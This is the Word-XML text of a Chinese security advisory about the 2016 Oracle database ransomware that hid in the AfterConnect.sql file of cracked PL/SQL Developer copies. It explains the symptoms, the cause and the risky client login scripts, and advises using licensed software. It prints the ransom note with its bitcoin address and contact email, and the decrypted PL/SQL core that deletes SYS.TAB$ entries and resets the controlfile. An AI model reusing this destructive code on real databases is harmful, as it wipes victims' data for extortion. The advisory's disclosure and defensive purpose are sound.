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ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>【红色警报】近期Oracle数据库遭受比特币勒索攻击原因揭秘和预防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8"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="979797"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>作者：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.eygle.com/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>eygle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="979797"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t> |</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang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eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://translate.google.com/translate?langpair=zh-CN|en&amp;hl=zh-CN&amp;ie=UTF8&amp;u=http://www.eygle.com/archives/2016/11/AfterConnect_hacked.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>English</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="979797"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="979797"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>【转载时请标明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang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eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.eygle.com/archives/2016/11/AfterConnect_hacked.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>出处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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color w:val="979797"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和作者信息】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="979797"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="979797"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang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eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.enmoedu.com/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>恩墨学院</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="979797"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t> OCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="979797"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>培训传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="979797"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DBA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="979797"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成功之道】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979797"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang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eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.eygle.com/archives/2016/11/AfterConnect_hacked.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://www.eygle.com/archives/2016/11/AfterConnect_hacked.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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最近，很多用户遭遇到数据库的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.enmotech.com/web/detail/1/92/1.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>安全问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w: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，我们在此提示所有Oracle数据库用户关注此问题。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.enmotech.com/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>云和恩墨</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w: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技术团队也准备好随时帮助用户应对和处理这样的困境。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b/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>问题症状：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登录数据库时，提示数据库被锁死，黑客提示发送5个比特币可以解锁。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如果从客户端登录，你获得的提示信息示例了能如下：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在数据库的日志中，可能获得的信息如下：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ORA-00604: error occurred at recursive SQL level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 xml:space="preserve">ORA-20315: 你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (大小写一致)  之后把你的Oracle SID邮寄地址 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "mailto:sqlrush@mail.com" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlrush@mail.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w: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我们将让你知道如何解锁你的数据库 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 xml:space="preserve">Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive),  after that send your Oracle SID to mail address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "mailto:sqlrush@mail.com" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sqlrush@mail.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w: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, we will let you know how to unlock your database.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ORA-06512: at "XXX.DBMS_CORE_INTERNAL         ", line 27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ORA-06512: at line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b/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>问题原因：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根据我们收集的信息分析，这个问题的原因是：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如果用户从某些不明来源下载了PL/SQL Developer工具后（尤其是各种绿色版、破解版），这个工具的安装目录存在一个脚本文件AfterConnect.sql，正常安装这个脚本是空文件，但是被注入的文件，该脚本包含了一系列的JOB定义、存储过程和触发器定义。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受感染的AfterConnect.sql脚本开头伪装非常正常的代码：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实质内容却是加密的恶意代码：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create or replace procedure "DBMS_SUPPORT_INTERNAL         " wrapped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a000000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354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abcd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abcd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abcd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abcd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abcd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abcd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abcd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abcd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abcd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abcd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abcd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abcd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abcd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abcd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abcd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6f2 467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N/V8HjJRfuLs0jji4Nsz59BipVwwg0NcTPZ3Z46BQqqVlW/f91N+YSzjDJV+ZQUuE5EGR366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EJMlfvzRE58yt6OZc4KSTcpvVvL2DbSsleURlQZtls3WJA5pz/M0+jPWnkT4FjkVuBeLaMdy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脚本代码的核心部分解密后如下：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   SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;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   IF (DATE1&gt;=1200) THEN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   EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system  as select * from sys.tab$';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   DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) 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   COMMIT;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   EXECUTE IMMEDIATE 'alter system checkpoint';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   SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);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   FOR I IN 1..2046 LOOP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 xml:space="preserve">   DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive),  after that send your Oracle SID to mail address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "mailto:sqlrush@mail.com" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sqlrush@mail.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w: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, we will let you know how to unlock your database.');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 xml:space="preserve">   DBMS_SYSTEM.KSDWRT(2, '你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (大小写一致)  之后把你的Oracle SID邮寄地址 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "mailto:sqlrush@mail.com" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlrush@mail.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w: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我们将让你知道如何解锁你的数据库 ');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   END LOOP;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   END IF;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END; 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一旦使用这个工具访问数据库，相应对象会被后台自动注入数据库，执行触发器阻止后续的用户登录，并通过任务Truncate数据库表。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我们强烈建议用户检查数据库工具的使用情况，避免使用来历不明的工具产品。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b/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们强烈建议：采用正版软件，规避未知风险。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b/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>安全漏洞：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几乎绝大多数客户端工具，在访问数据库时，都可以通过脚本进行一定的功能定义，而这些脚本往往就是安全问题的漏洞之一，来历不明的工具是数据库管理大忌，以下列出了常见客户端工具的脚本位置，需要引起注意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SQL*Plus: glogin.sql / login.sql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TOAD : toad.ini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PLSQLdeveloper: login.sql / afterconnect.sql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b/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>处置建议：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如果您的数据库已经遭受攻击和数据损失，可以紧急联系云和恩墨的服务团队，我们可以帮助您处理数据修复事宜。云和恩墨的ODU产品，可以在数据丢失后最大限度的恢复数据。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b/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>事件回顾：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2015年9月，XcodeGhost入侵苹果iOS事件在业内引起不小震动。事件起因为不知名黑客向iOS应用开发工具Xcode植入恶意程序，通过网盘和论坛上传播，被感染的App并以此劫持苹果用户相关信息。来自多个安全团队数据显示，病毒感染波及AppStore下载量最高的5000个App其中的76个，保守估计受影响用户数超过一亿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40" w:afterAutospacing="0"/>
        <w:ind w:lef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color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2012年2月，中文版putty等SSH远程管理工具被曝出存在后门，该后门会自动窃取管理员所输入的SSH用户名与口令，并将其发送至指定服务器上。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Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Optima" w:hAnsi="Optima" w:eastAsia="Optima" w:cs="Optima"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>请关注云和恩墨公司微信号，我们将随时更新这次安全事故的其他信息。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eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>来自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.eygle.com/archives/2016/11/AfterConnect_hacked.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://www.eygle.com/archives/2016/11/AfterConnect_hacked.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
